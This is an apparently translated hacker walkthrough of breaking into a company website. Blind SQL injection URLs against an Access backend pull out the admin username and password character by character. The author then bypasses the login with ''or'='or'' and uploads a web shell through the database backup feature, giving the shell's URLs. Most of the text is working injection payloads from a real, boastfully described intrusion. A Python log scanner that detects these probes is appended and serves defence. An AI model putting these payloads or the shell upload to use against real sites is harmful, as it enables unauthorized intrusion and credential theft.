Walkthrough: taking over a website by manual injection against Access
hacked by {R.H.T}12
http://www.xxx.com/NewsInfo.asp?id=95'
Returned an error page.
http://www.xxx.com/NewsInfo.asp?id=95%20and%201=1
Correct page.
http://www.xxx.com/NewsInfo.asp?id=95%20and%201=2
Returned an error page.
http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists(selectcount(*)fromsysobjects)
Returned an error page. So it is confirmed to be an ACCESS database.
http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20admin)
Error. There is no table named admin.
http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20vipusers)
http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20account)
http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20admin_userinfo)
http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20admin_user)
http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20manage)
None of them exist...
http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20manage_user)
Got it.
The table name is guessed: manage_user
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(password)%20from%20manage_user)>0
Guessed the password column name right away.
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(user)%20from%20manage_user)>0
Error page.
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(manage_user)%20from%20manage_user)>0
Error page.
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(username)%20from%20manage_user)>0
Correct page.
To sum up.
The manage_user table.
Column names:
username
password
A typical junk site.
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(*)%20from%20manage_user)>5
Error.
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(*)%20from%20manage_user)
Correct page
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(*)%20from%20manage_user)=1
Correct page. There is only one record.
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20len(username)%20from%20manage_user)>3
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20len(username)%20from%20manage_user)>5
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20len(username)%20from%20manage_user)=5
Correct.
The administrator's username is 5 characters long.
He is definitely using admin
Let's try.
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,1,1))%20from%20manage_user)=97
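Convert it: 97 is a
Let's ask whether the second character is d.
Right at this moment, close to midnight, the connection suddenly dropped... So frustrating... like going limp at the critical moment.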
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,2,1))%20from%20manage_user)=100
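Returned the normal page. 100 is d
The first character is a, the second is d, 5 letters in total. It is usually admin
At this point the group chat started shouting... everyone had just been disconnected... Someone said it was an attack by Taiwanese hackers. Soon after, someone said people abroad had just been disconnected too... The actual cause is unknown for now.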
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,3,1))%20from%20manage_user)=109
The third character is m
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,4,1))%20from%20manage_user)=105
The fourth character is i
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,5,1))%20from%20manage_user)=110
The fifth character is n
OK, admin
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20len(password)from%20manage_user)=6
Correct on the first try. The password is 6 characters long.
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)>50
Returned normal.
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)>70
Returned an error
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)>60
Wrong.
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)>65
Wrong
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)=63
Wrong
... Confused.
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)=55
Correct...
Convert 55: it is 7
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,2,1))%20from%20manage_user)=55
The second character is also 7
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,3,1))%20from%20manage_user)=55
The third character is not...
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,3,1))%20from%20manage_user)=59
Correct. 59 converts to ;
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,4,1))%20from%20manage_user)=57
Fourth character. 57 converts to 9
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,5,1))%20from%20manage_user)=62
Fifth character. 62 converts to >
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,6,1))%20from%20manage_user)=62
The sixth is too...
To sum up.
Account: admin
Password: 77;9>>
OK, let's find the admin backend.
http://www.xxx.com/manage/Login.asp
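Guessed it directly from the table name. Got it right.
Logged in with the account and password...
It said the account or password was incorrect!
Frustrating.
Could this not be the right backend...
Scanned with a tool... it found only this one backend.
What now.
Guess the credentials: admin admin
Wrong... Idiots like that are rare these days.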
admin admin888
Tried for a long time... was about to give up.
Suddenly remembered the universal password.
'or'='or'
'or'='or'
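Got in......
WTF... This vulnerability actually still exists... What kind of junk site is this. xxxxx邦 auto accessories company...
I got angry. Privilege escalation.
Looked around the backend. On the message board I saw that someone had planted a one-line web shell. Damn. Deleted it.
The database can be backed up. Uploaded a shell directly through the database backup.
OK, taken over.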
http://www.xxx.com/UploadFiles/2010491394386.asp
http://www.xxx.com/1.asp
Comment: The author wrote this up in great detail. The admin password here is typical Leichi (雷池) encryption: 77;9>>=658598.
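From the defender's side, the probe sequence in this write-up leaves a recognisable trail in web server logs. The following is an added example, not part of the original post: Python that classifies the boolean-probe shapes shown above and counts them per client. The log lines, IP addresses, simplified IIS W3C field layout, pattern names and threshold are all constructed assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines (not real traffic), simplified IIS W3C layout:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2024-01-15 23:40:01 203.0.113.7 GET /NewsInfo.asp id=95 200
2024-01-15 23:41:09 198.51.100.23 GET /NewsInfo.asp id=95%20and%201=1 200
2024-01-15 23:41:15 198.51.100.23 GET /NewsInfo.asp id=95%20and%201=2 500
2024-01-15 23:42:30 198.51.100.23 GET /NewsInfo.asp id=95%20and%20exists%20(select%20count(*)%20from%20admin) 500
2024-01-15 23:43:02 198.51.100.23 GET /NewsInfo.asp id=95%20and%20exists%20(select%20count(*)%20from%20manage_user) 200
2024-01-15 23:44:11 198.51.100.23 GET /NewsInfo.asp id=95%20and%20(select%20count(username)%20from%20manage_user)>0 200
2024-01-15 23:45:40 198.51.100.23 GET /NewsInfo.asp id=95%20and%20(select%20top%201%20len(username)%20from%20manage_user)=5 200
2024-01-15 23:46:05 198.51.100.23 GET /NewsInfo.asp id=95%20and%20(select%20top%201%20asc(mid(username,1,1))%20from%20manage_user)=97 200
2024-01-15 23:47:00 192.0.2.50 GET /search.asp q=salt+and+1=1+pepper 200
"""

# One pattern per probe shape used in the walkthrough (names are hypothetical).
PROBES = {
    "boolean_test": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
    "table_guess": re.compile(r"exists\s*\(\s*select\s+count\(\*\)\s*from\s+\w+", re.I),
    "column_guess": re.compile(r"select\s+count\(\w+\)\s*from\s+\w+", re.I),
    "length_probe": re.compile(r"select\s+top\s+1\s+len\(\w+\)", re.I),
    "char_probe": re.compile(r"asc\(mid\(\w+,\d+,1\)\)", re.I),
}

def classify(query):
    """Return the probe kinds found in one URL-encoded query string."""
    decoded = unquote_plus(query)
    return [name for name, rx in PROBES.items() if rx.search(decoded)]

def scan(log_text, threshold=3):
    """Count probe kinds per client IP; keep clients with >= threshold hits."""
    per_ip = defaultdict(Counter)
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) != 7:
            continue  # W3C header lines or malformed entries
        per_ip[fields[2]].update(classify(fields[5]))
    return {ip: c for ip, c in per_ip.items() if sum(c.values()) >= threshold}

if __name__ == "__main__":
    for ip, counts in scan(SAMPLE_LOG).items():
        print(ip, dict(counts))
```

The single `and 1=1` hit from 192.0.2.50 stays below the threshold, which is why the count is kept per client rather than alerting on any one match.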